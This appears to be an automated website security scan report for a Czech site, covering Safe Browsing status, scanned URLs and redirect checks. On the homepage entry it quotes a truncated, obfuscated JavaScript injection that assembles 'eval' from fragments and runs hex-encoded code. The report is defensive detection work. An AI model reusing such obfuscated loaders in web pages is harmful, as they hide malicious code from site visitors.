Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=hladkyelektro.wz.cz
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.hladkyelektro.wz.cz/ | 200 OK Content-Length: 53356 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var jj=window["e"+"v"+new String("a")+new String("l")]("e"+"v"+new String("a")+new String("l")); jj('\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x77\x70\x31\x28\x67\x38\x70\x39\x45\x29\x7b\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x78\x78\x38\x42\x28\x6a\x59\x48\x67\x29\x7b\x76\x61\x72\x20\x64\x44\x6e\x70\x57\x3d\x30\x3b\x76\x61\x72\x20\x6c\x64\x4b\x3d\x6a\x59\x48\x67\x2e\x6c\x65\x6e\x67\x74\x68\x2c\x20\x69\x68\x59\x6e\x4b\x36\x65\x3d\x30\x3b\x77\x68\x69\x6c\x65\x28\x69\x68\x59\x6e\x4b\x36\x65\x3c\x6c\x64\x4 Antivirus reports:
| ||
http://www.hladkyelektro.wz.cz/test404page.js | HTTP/1.1 302 Found Connection: close Date: Sun, 14 Sep 2014 19:00:23 GMT Location: http://e.wz.cz/404.html Server: Apache Content-Length: 280 Content-Type: text/html; charset=iso-8859-1 | clean |
http://e.wz.cz/404.html | 200 OK Content-Length: 12877 Content-Type: text/html | clean |
http://www.google-analytics.com/urchin.js | 200 OK Content-Length: 22678 Content-Type: text/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: hladkyelektro.wz.cz
Result:
GET / HTTP/1.1
Host: hladkyelektro.wz.cz
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: hladkyelektro.wz.cz
Referer: http://www.google.com/search?q=hladkyelektro.wz.cz
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: hladkyelektro.wz.cz
Referer: http://www.google.com/search?q=hladkyelektro.wz.cz
Result:
The result is similar to the first query. There are no suspicious redirects found.